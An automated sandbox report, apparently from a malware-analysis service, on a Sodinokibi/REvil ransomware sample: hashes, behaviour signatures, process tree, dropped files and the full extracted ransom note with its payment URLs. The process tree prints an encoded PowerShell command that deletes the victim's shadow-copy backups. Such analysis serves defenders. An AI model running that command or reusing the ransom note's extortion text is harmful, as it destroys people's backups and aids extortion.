Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-08-2024 15:19

General

  • Target

    c344cb3365d1c252ec9bca116df262c2_JaffaCakes118.exe

  • Size

    207KB

  • MD5

    c344cb3365d1c252ec9bca116df262c2

  • SHA1

    feb6d0bbacdb99b882d563f27b78c9723f2aac49

  • SHA256

    5058c2ecac89eb616b4478e9a1f61522ef906adc2fd18206ee6ab445be3b3ff3

  • SHA512

    ce5b7ab0ded562ca52f6f5a281f0d46b88f76fd39385b52db7bc14e244434143215da8cdf0323f6de4a34b024f7bffc4734353da89fef5193f9ab454ede749be

  • SSDEEP

    3072:1LFrb30BRtBZZg+i2ayy2RjLTuVyu7CJDgoMT3Q092+ZCInhNLFrb30BRtBZZg+f:ZJ0BXScFy2RsQJ8zgkZCihJ0BXScv

Malware Config

Extracted

Path

C:\ProgramData\7b3f1-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 7b3f1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/939E5D1045654B3A 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/939E5D1045654B3A Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: pfcRH5jvGg/5vPdKpLcDbDbAg5l/kz3uNwTzH/LiRTLIH5B/XlYGWQZpdkPlSB/v 5vDtUk96ZoMzFsUVUiiHDRqy+7insoiIeOmgbprDZGfN9sFoWZndLKZF/Im3nuSO oQcBokvaMPuSY+HkmtubUyNzqzI+ag4IqBy0cDwK2CbCLRCIcTld2i9Y6BSSSMkM UQe9CnlH4M0Qpd9/a0AxCw1ukOuK+tYiiU6BNCJSQBna6KU+IoblMfY5+N4hWJO3 f9qywecdGrmv2OYLy/R0BA98H2st86mdlhs0Q84Eb3M6y+cke4iXiE083FWufac4 Wa40yEm3aUsw+lYuzZwnjOhnMlTT2GjtmYGepftklEoDh2JineaYS06I7Q3+4O/i tl6jy9Z0nxwL7ARHyNRb+d4tUDGXgFYr/PyTHo5ESUFCQGoAFp9ZLIWcmvS4q8FF bc1SgUhKa+Xc5TZ9gd1mavHyudkIVfBESlzsm4EwOsVnkc1FUGdAaF1y2KSf2N6f cXm8dqnSTIW8k3QYGjEwtkexSCTAypu4hre9KrPR6syvtr7445MH8CyYjrJ53AMw +RHarmJjoSJYqucd19qRL9aYkHFowKVU4or32O1ZNTzahOJOT4wW3tjQ1EdHlZSQ NyKCEcWT0ki4l2JwiWGZ/QEytFX8DK2tRp89yyPsHmuvK1Ntzq/OWTqUIqMoD8SM mrlOZgGJ5XfgzhCz/bKVcA0HaynAl1J0IpMctUIqYL/pNfAaEs5vT8DZODlbt8Jz T0hwxobo2fiGNGeWbPPCB0CUUBrijZKPUEzYEr/QpbZNvxV9GS/Iyt/IGkvQgN4U QqhrM4/BqzlU6hIWlNMpjPCJHktO0TWVdqie1CMzmDKH5OjMDqlos4C+nqDKr0ca bbrK00ExiBAGrMhwudnF0KdJHdUYRFDBGe/3VD6109Uw03LdkNOe61CAwvzCqihp /QAli6DChHvxWFHo2VNH/bj4WEVTa0FUtcQ5LG+ghdIXgsGjDd8nhmnRQ87iF8lq 5AGtjonej55yIdNZ2uQL+/bPqG4ardqBn90ACPSyEvwvYab3Izxal8eeQbU0D/rs mzQZy98GO4IbsQB3uoRSihKgajnENeVwTECFENGtOT7P183bEeSdJ9VJ38iSHbEr STSwqFEUbRq+0jrqSGkHwTvKxI04LQ00UHPauL6nek/zvRF4sMvl8ZBi4jUeaCoX 1IeF7O3AF2mdFfTdtossh5agg5vbn1E2e1dDPmCNARH2pgiWUEuoMYAjR20EUgDr amUI4ioi2aIqC3pDqHhn30LLZZ1f5fxKyRggRn3oFAZApIBVkQTp1coRd7JU2IxL 9QyPNl40kBLrxb1gfRlvQF/Td+rzQwcL9kdwWxS7t544Q8te ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/939E5D1045654B3A

http://decryptor.cc/939E5D1045654B3A

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops desktop.ini file(s) 64 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 24 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\c344cb3365d1c252ec9bca116df262c2_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\c344cb3365d1c252ec9bca116df262c2_JaffaCakes118.exe"
    1⤵
    • Drops startup file
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4960
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2504
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1084
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2948
    • C:\Windows\explorer.exe
      explorer.exe
      1⤵
      • Boot or Logon Autostart Execution: Active Setup
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:3732

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\7b3f1-readme.txt

      Filesize

      6KB

      MD5

      81c4a8a5a144fdd317ee3f62cedd100c

      SHA1

      40f7821f98e39df45f859e77a4f4164253e215ea

      SHA256

      e1ddde1a3536d73367351386810d2738b8d2209ca975306c14976a9a8b5d5225

      SHA512

      d66db51a8ec38470d56c6abe4a33bc1d0e84960068617223b8bf43669fb865945faf1025b131a052474611bdcb4a4b2779a3fc5bbc8fe0d6a260b0136010fa60

    • C:\ProgramData\Microsoft\Windows\Caches\{4471DAED-D1F0-4F9F-8025-FF94B3F10148}.2.ver0x0000000000000001.db.7b3f1

      Filesize

      1KB

      MD5

      c7169116fa56ee6ebe507ba39953c385

      SHA1

      7c825893475367c75e2ccdee981d9ea8480d0936

      SHA256

      1e6fdc79c69f3a2750ee9b1cf97f5afecdbf5adaac13c1489ef71c63afffd4c6

      SHA512

      59421e8b0b27d6dc352d52ff8e70a2bc3701c755fd24a670328bdf58c9736c6ef60c6ba91dc3c0af7bf2aa3c2a99439f5d1bf06bf061cc21ec878d7d067726f6

    • C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.7b3f1

      Filesize

      623KB

      MD5

      68597804e23f3ad9aef4db83cb4a92ee

      SHA1

      d279e84358c441c1b2ea6e25b92cd46137708428

      SHA256

      6e9edbaa66d07e3bddb64da4b2714c4644e2022ae0a59ffb19b5a18c72060cfb

      SHA512

      380031ce8fa83087ff2c5f6634efb02eef7c39edf874d8c45b797d517ee863a167140d5a4f0a4fd250e62a98134f5d7f6aee9c833ae004f545fb06cdaafc48f8

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ihybu35i.nfb.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • \??\c:\users\admin\appdata\local\microsoft\clr_v4.0\usagelogs\powershell.exe.log

      Filesize

      3KB

      MD5

      fac2326e664b662327e9ff5d954f73ec

      SHA1

      2d0236dc33e652913c7e64aced279edcf5aadbf1

      SHA256

      86cd163707c3a9b64001fbe30f394150b7a7e087f600297adc693a1969c42cea

      SHA512

      248c804d8d59ec3902dadcf1e7b4a56d73704cae54a0ea082c6c4c965c1d8303681f58a08e2dc050581439d269794a52c01037e933f93b25094d41de4391c32c

    • \??\c:\users\admin\appdata\local\microsoft\windows\powershell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      b01cdb140dbd390c0f2db1cf06d59da9

      SHA1

      229a93037933af2a2d70e462e4c88ce03ad1d1e3

      SHA256

      7b55be4c48b090b8d6e1189b82c4222bd5323267c38ce263ace3c465f07f9e60

      SHA512

      43ea4b53aab92776e1c440c4e6ceffbc9a2b306f4476b04884909f26d9b0dc0f530ef5b3a7952db96e5aff169444c16b640de86bc442265353e30b1f65bf73eb

    • memory/2504-0-0x00007FF8DA183000-0x00007FF8DA185000-memory.dmp

      Filesize

      8KB

    • memory/2504-10-0x00000255D3FB0000-0x00000255D3FD2000-memory.dmp

      Filesize

      136KB

    • memory/2504-11-0x00007FF8DA180000-0x00007FF8DAC41000-memory.dmp

      Filesize

      10.8MB

    • memory/2504-12-0x00007FF8DA180000-0x00007FF8DAC41000-memory.dmp

      Filesize

      10.8MB

    • memory/2504-15-0x00007FF8DA180000-0x00007FF8DAC41000-memory.dmp

      Filesize

      10.8MB